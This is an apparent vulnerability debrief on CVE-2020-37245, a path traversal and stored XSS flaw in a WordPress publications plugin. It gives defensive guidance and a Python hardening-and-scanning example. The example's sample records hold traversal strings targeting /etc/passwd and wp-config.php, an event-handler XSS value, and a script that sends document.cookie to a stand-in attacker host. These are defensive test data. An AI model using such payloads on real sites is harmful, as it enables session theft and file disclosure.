PatchSiren

PatchSiren cyber security CVE debrief

CVE-2020-37245 Downloads CVE debrief

CVE-2020-37245 affects Supsystic Digital Publications 1.6.9 and combines directory traversal with stored cross-site scripting. An attacker can use the Folder input field to reach files outside the web root, and unsanitized publication settings can persist script injection that triggers when publications are viewed or edited.

Vendor: Downloads
Product: Unknown
CVSS: HIGH 8.7
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-05-16
Original CVE updated: 2026-05-16
Advisory published: 2026-05-16
Advisory updated: 2026-05-16

Who should care

WordPress administrators, managed hosting teams, and security responders responsible for sites using Supsystic Digital Publications 1.6.9 should care most. Reviewers of publication-editing workflows should also pay attention because the issue can both expose files and persist malicious script content.

Technical summary

The supplied NVD record and linked references describe a path traversal flaw in the Folder input field: directory traversal sequences in that field are not rejected, so a crafted value escapes the intended web-root boundary. The same plugin also fails to sanitize publication settings fields, so values supplied for parameters such as Area Width and Publication Width are stored and later rendered unescaped, giving stored XSS. NVD lists CWE-79 (cross-site scripting) as the primary weakness, which covers the stored XSS component rather than the traversal, and assigns a CVSS score of 8.7 (HIGH).

Defensive priority

High. The issue is network-reachable and can lead to sensitive file access plus persistent script injection in publication views or edit flows, so affected deployments should be treated as urgent patch-or-remove candidates.

Recommended defensive actions

  • Identify any WordPress sites running Supsystic Digital Publications 1.6.9 and treat them as exposed until verified otherwise.
  • Upgrade to a fixed version if the vendor provides one; if no safe version is available, disable or remove the plugin.
  • Review publication settings and Folder-related inputs for unexpected traversal strings (including percent-encoded forms such as %2e%2e/ and backslash variants) or stored script content such as <script> tags, javascript: URLs, and on*= event handlers.
  • Inspect affected sites for unauthorized file reads, altered publication settings, and signs of stored XSS in rendered publications.
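The following is an added example written for this debrief; it is not PatchSiren's code and not the Supsystic plugin's own code. It illustrates both the technical summary (a Folder value resolved without a containment check, and width settings stored as raw strings) and the review step above: `resolve_folder` is the hardened counterpart of the Folder handling, `sanitize_width` is the hardened counterpart of the numeric settings handling, and `scan_settings` is a triage scanner for stored settings. The function names, the web root, the `(publication_id, field, value)` record shape and the sample records are all assumptions made for the example; the advisory does not describe the plugin's option names or storage layout.

```python
"""Added example, not code from PatchSiren or Supsystic.

Hardened folder resolution and numeric-setting sanitization beside a scanner
that flags traversal strings and script content in stored publication
settings. All names and sample data below are assumed for illustration.
"""
import os
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed web root; the check works for any absolute path

# Coarse triage patterns: a '..' path segment, and common stored-XSS markers.
# They are meant to surface candidates for manual review, not to be exact.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.($|[\\/])")
SCRIPT_RE = re.compile(r"<\s*script|javascript:|on[a-z]+\s*=", re.IGNORECASE)


def resolve_folder(user_folder, web_root=WEB_ROOT):
    """Return the absolute folder path only if it stays inside web_root.

    The weakness described for the Folder field is a path built from user
    input without this containment step, so '../' sequences walk out of the
    root. Here the value is percent-decoded, backslashes are treated as
    separators (conservative; PHP on Windows would), leading slashes are
    stripped so an absolute value cannot replace the root, and the joined
    path is normalised before the prefix check. normpath is lexical; a
    deployment should also apply realpath to an existing path so a symlink
    inside the root cannot point outside it.
    """
    root = os.path.normpath(web_root)
    decoded = unquote(user_folder).replace("\\", "/")
    candidate = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None


def sanitize_width(value, default=600, lo=1, hi=10000):
    """Area Width and Publication Width are numeric settings, so the safe fix
    is to parse them as integers and clamp to a sane range, never to store the
    raw string. Anything that is not a plain integer falls back to default."""
    if isinstance(value, bool) or not re.fullmatch(r"\s*\d+\s*", str(value)):
        return default
    return min(max(int(value), lo), hi)


def scan_settings(records):
    """Flag stored settings carrying traversal strings or script content.

    records: iterable of (publication_id, field, value) tuples, the shape an
    exported settings table might take (assumed). Values are percent-decoded
    first so encoded traversal such as %2e%2e/ is not missed.
    Returns a list of (publication_id, field, finding) tuples.
    """
    findings = []
    for pub_id, field, value in records:
        text = unquote(str(value))
        if TRAVERSAL_RE.search(text):
            findings.append((pub_id, field, "traversal"))
        if SCRIPT_RE.search(text):
            findings.append((pub_id, field, "script"))
    return findings


# Constructed sample data for the example, not taken from any real site.
SAMPLE_RECORDS = [
    (1, "folder", "issues/2020"),
    (1, "area_width", "800"),
    (2, "folder", "../../../../etc/passwd"),
    (2, "area_width", '600" onmouseover="alert(1)"'),
    (3, "folder", "%2e%2e/%2e%2e/wp-config.php"),
    (3, "publication_width",
     "<script>fetch('//evil.example/?c='+document.cookie)</script>"),
]


if __name__ == "__main__":
    for folder in ("issues/2020", "../../../../etc/passwd"):
        print(folder, "->", resolve_folder(folder))
    print("800 ->", sanitize_width("800"), "| tainted ->",
          sanitize_width('600" onmouseover="alert(1)"'))
    for pub_id, field, finding in scan_settings(SAMPLE_RECORDS):
        print(f"publication {pub_id}: {field} contains {finding}")
```

For a real review, feed `scan_settings` the exported rows of whatever table the plugin stores its settings in, and treat every "traversal" or "script" hit as a record to inspect by hand; the regexes are deliberately broad and will occasionally flag benign strings.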

Evidence notes

Evidence in the supplied corpus comes from the NVD modified record and its listed references. The record states Supsystic Digital Publications 1.6.9 has a Folder-input path traversal issue and unsanitized publication settings leading to stored XSS, with CWE-79 listed as the primary weakness. The supplied CVE published and modified timestamps are 2026-05-16T16:16:20.867Z, and the enrichment does not mark this as KEV.

Official resources

The NVD record cites official CVE/NVD entries and supporting references, including the plugin ZIP, vendor site, a VulnCheck advisory, and an Exploi